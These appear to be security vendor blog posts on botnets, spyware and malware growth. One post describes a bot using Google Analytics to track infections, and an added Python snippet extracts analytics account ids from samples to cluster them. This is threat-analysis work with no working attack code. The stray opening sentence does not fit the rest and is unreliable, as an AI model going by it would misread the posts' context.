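    The heuristics are deliberately coarse; in practice they are a triage signal for a channel whose members never type, not a verdict on their own.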

    Google Analytics and Bots

    Every day we see different things that the miscreants develop to make their job easier. Today I was checking the 288th variant of Opanki. The really interesting thing about this one is that the botnet owner seems concerned about not having an organized way to keep track of the bots, their geographic distribution, for example. But how can he or she accomplish this in an easy way? Yes, Google Analytics! As many of you know, Google offers Google Analytics (www.google.com/analytics) as a free service that allows anyone to collect and view tracking information about website visitors, like Unique Visitor Tracking, Daily Visitors, Geo Location…

    The following code was found on this bot variant. This is typical code that one would usually add in to a webpage to make Google Analytics work:

    _uacct = "UA-XXXXXX-X";   // Google Analytics account id of the "site" owner, here the botnet owner
    _udn = "xxxxxx.com";      // domain the recorded hits are attributed to
    urchinTracker();          // legacy urchin.js call that reports the visit to Google

    _uacct and _udn are parameters that identify the site owner, so that the statistics can later be looked up.

    Yet another example of how the miscreants are organizing themselves…
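    Because the same _uacct value ends up in every bot that reports to the same dashboard, it is a handy pivot for analysts. The following Python, added here and not part of the original post, pulls UA account ids and _udn domains out of raw sample bytes (plain and UTF-16LE) and groups samples that share an id; all sample contents, ids and domains are constructed.

```python
import re
from collections import defaultdict

# Patterns for the legacy urchin.js snippet quoted above: tracker account id and _udn domain.
UA_ID_RE = re.compile(rb"UA-\d{4,10}-\d{1,3}")
UDN_RE = re.compile(rb"""_udn\s*=\s*["']([A-Za-z0-9.-]+)["']""")
# A NUL between two printable bytes: collapsing it turns UTF-16LE ASCII text into plain ASCII.
WIDE_NUL_RE = re.compile(rb"(?<=[\x20-\x7e])\x00(?=[\x20-\x7e])")

def extract_ga_indicators(blob: bytes) -> dict:
    """Return the Google Analytics account ids and _udn domains embedded in a sample."""
    accounts, domains = set(), set()
    for view in (blob, WIDE_NUL_RE.sub(b"", blob)):      # raw bytes and de-widened text
        accounts.update(m.decode() for m in UA_ID_RE.findall(view))
        domains.update(m.decode() for m in UDN_RE.findall(view))
    return {"accounts": sorted(accounts), "domains": sorted(domains)}

def cluster_by_account(samples: dict) -> dict:
    """Group sample names by shared account id: one id means one operator dashboard."""
    clusters = defaultdict(list)
    for name, blob in samples.items():
        for acct in extract_ga_indicators(blob)["accounts"]:
            clusters[acct].append(name)
    return {acct: sorted(names) for acct, names in clusters.items()}

# Constructed sample contents (not real malware); ids and domains are made up.
SAMPLES = {
    "variant_a.bin": b'\x90\x90_uacct = "UA-123456-1";\x00_udn="example.invalid";urchinTracker();',
    "variant_b.bin": b"MZ\x90\x00" + "UA-123456-1".encode("utf-16-le") + b"\x00\x00",
    "variant_c.bin": b'_uacct="UA-654321-2"; _udn="stats.example.invalid";',
    "benign.bin": b"no tracker strings in here",
}

if __name__ == "__main__":
    for acct, names in cluster_by_account(SAMPLES).items():
        print(acct, "->", ", ".join(names))
```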

    McAfee Avert Labs releases first issue of Sage!!!!

    An epic transformation in the world of security is upon us. Today, we released the first issue of our semi-annual security magazine, Sage. We will leverage this communication vehicle to deliver meaningful and sometimes raw content to the masses. We take our responsibility to protect the public from malicious malcontents very seriously and will not shy away from difficult content or taboo topics. Instead, we will share with the world our day-to-day fight and let you decide how important the concepts being broached are to you.

    The premiere issue examines the use of open source by the malware writing community. We show the pivotal role that code sharing and full disclosure have played in the evolution of the threat environment, and we anticipate a surge in malware quality and reliability as the malware writers become more professional. Though open source cannot be blamed for how some unsavory individuals may choose to use its tools, techniques, and methodologies, the movement should acknowledge that there are dangers associated with some of its fundamental beliefs.

    Sage is meant to be a forum for thought leadership and serious discourse on topical security issues. By drawing on the Labs’ wealth of data and expertise, and writing challenging security articles, we hope to provoke important discussion about the digital battlefield we have found ourselves in.

    Get Sage now from the McAfee Threat Center site:

    http://www.mcafee.com/us/threat_center/white_paper.html

    “200,000!”

    Rockets bursting in air, fireworks everywhere!  Thank you for helping mark the 200,000th entry into the VirusScan malware (malevolent software) detection database.

    But truly, this is not a moment to celebrate.  Ever larger numbers of malware are a plague, not a cause for celebration.  Instead, we mark this moment simply as a milestone in our continual effort to fend off the bad stuff from everyone's machines.

    It is alarming that we reach this milestone so soon after September 2004 when the count reached 100,000.  Eighteen years to reach 100,000.  Less than two years to double.  Looking ahead, our researchers expect yet another doubling in a similar timeframe.  So, 100,000 new threats in the past two years, 200,000 new threats to come in the next two years!

    [Figure: Malware Count and Rate of Growth]

    The last two years have marked a tremendous increase in downloaders and bots, malware that has as its purpose to commandeer the target machine, to be used by the Command and Control machine.  Or rather, the person sitting behind that machine, who has as his motive, $$$$$$$.

    In early 2004, a number of viruses like Netsky, Bagle, and Mydoom would infect multiple millions of machines with each release of a new variant.  Many millions of machines would be compromised in a short amount of time causing great financial strife and immediate reaction from IT personnel as well as law enforcement.  Soon, Sven Jaschan was arrested for the creation of the Netsky and Sasser families of viruses.  At about the same time, the author of Gaobot/Agobot and Phatbot was also arrested.  With these two events, we all hoped the arrests would stem the tide on malware.

    Instead, malware distribution changed dramatically.  In the first half of 2004, 31 virus outbreaks were rated Medium and above.  The second half of 2004 saw 17 more.  That number fell to 12 for the whole of 2005.  And in 2006, there have been no outbreaks of similar severity!  Instead of huge virus events causing ire from all segments including law enforcement, the preferred method of malware distribution now involves the creation of many minor variants sent through controlled spam efforts.  Good family detection becomes crucial for a less worrisome experience on the Internet.

    Another area of concern is the growth of malware targeting mobile telephony.  The numbers are still small, only near 300.  As a result, rates of growth are exaggerated.  However, it will grow.  The worry, as our past experience with other forms of malware suggests, is that the growth will follow a curve much like the graph above, except that time will be compressed.  We are still in the era where malware targeting telephony is not yet purposefully stealing money.  And that is the concern.  When the phone becomes the standard means to transfer money, malware targeting telephony will truly explode, much as bots and other means of stealing money over the Internet have consumed our energies these past two years.

    And so, on this July 4th, our thanks to the men and women who serve, so we can all enjoy our liberties and pursue happiness.  And thanks also to the cadre of dedicated anti-malware researchers who on this day added that 200,000th malware detection entry, so we may pursue our enjoyment of the Internet experience with a little less worry.

    “Vulnerabilities, spam and spyware”

    In October 2004, the Federal Trade Commission started an investigation of reputed spammers. That story reached its conclusion on May 4th, 2006. Sanford Wallace (nicknamed Spamford) and his company, Smartbot.net, have to shut down their operation and give up more than $4 million in ill-gotten gains. Jared Lansky, an ad broker who disseminated ads containing Wallace's spyware, will give up $227,000 in ill-gotten gains.

    The FTC alleged that Sanford Wallace and his company, Smartbot.Net, exploited a security vulnerability in Microsoft's Internet Explorer Web browser in order to distribute spyware. The spyware caused the CD-ROM tray on computers to open and then issued a "FINAL WARNING!!" on computer screens with a message that said:

    "If your cd-rom drive's open . . . You DESPERATELY NEED to rid your system of spyware pop-ups IMMEDIATELY! Spyware programmers can control your computer hardware if you failed to protect your computer right at this moment! Download Spy Wiper NOW!" Spy Wiper and Spy Deleter, purported anti-spyware products the defendants promoted, sold for $30.

    The official documents are available here:

    May 4, 2006:

    October 12, 2004:

    • Complaint for Injunction and Other Equitable Relief [PDF 34K]
    • Memorandum in Support of Plaintiff's Motion for a Temporary Restraining Order with Expedited Discovery, Preservation of Documents and Order to Show Cause Why a Preliminary Injunction Should Not Issue Against Defendants [PDF 68K]
    • News Release

    W32/Nugache@MM IRC bot

    A few interesting variants of an IRC bot named W32/Nugache@MM (http://vil.nai.com/vil/content/v_139347.htm) have appeared. Rather than resolving an IRC server via DNS and connecting back to it for commands, the bot attempts to create a P2P network, listening on TCP port 8. Initial execution results in outgoing connections (also on TCP port 8) to one of several IP addresses, presumably some seeded infections used to bootstrap the P2P network. The bot spreads via email, AIM, Windows Messenger and across the network.

    One interesting aspect of this family is its (supposed) ability to repack itself. Though unconfirmed in replication testing thus far, reports suggest it attempts to repack itself prior to propagating. If true, this would create an interesting challenge for AV scanners.

    First Kernel Mode IRC bot?

    A couple weeks ago we saw a blog posting by a person named tibbar claiming they had written the first kernel mode IRC bot. See http://tibbar.blog.co.uk/2006/04/06/kernel_mode_IRCbot~708256 for the announcement.

    Is this really the first kernel mode bot? I think so, but it is purely a proof of concept with no teeth. What makes this announcement important in my eyes is that it illustrates two points that matter a great deal when we look at the future production of bots and malware in general: the use (and reuse) of open source components, and the increase in programmer skill sets.

    This kernel bot was easily created because it utilized a kernel socket library written and placed in the public domain by Valerino on rootkit.com. As The Mythical Man-Month states, there is no silver bullet in software development, but the brass bullet is module reuse, which we are seeing more and more within malware. Would this kernel bot have been created if it weren’t for the prebuilt components that were available?

    The second important point is that the code organization of the project allows the IRC functionality of the kernel bot to be tested in user mode, where a lot of bot developers are more comfortable, thereby easing the development of variants with more IRC functionality. Is this a revolutionary ability? No, but it is more advanced than what most bot developers do. I believe the advancement of skill sets will lead to more destructive bots as more intelligent programmers spend time increasing bot code quality, adding advanced features (encrypted P2P using proper key exchange, for example) and building test harnesses. Malware, and bot development specifically, will start to exhibit the standard development life cycle seen in other open source projects such as Apache and Firefox.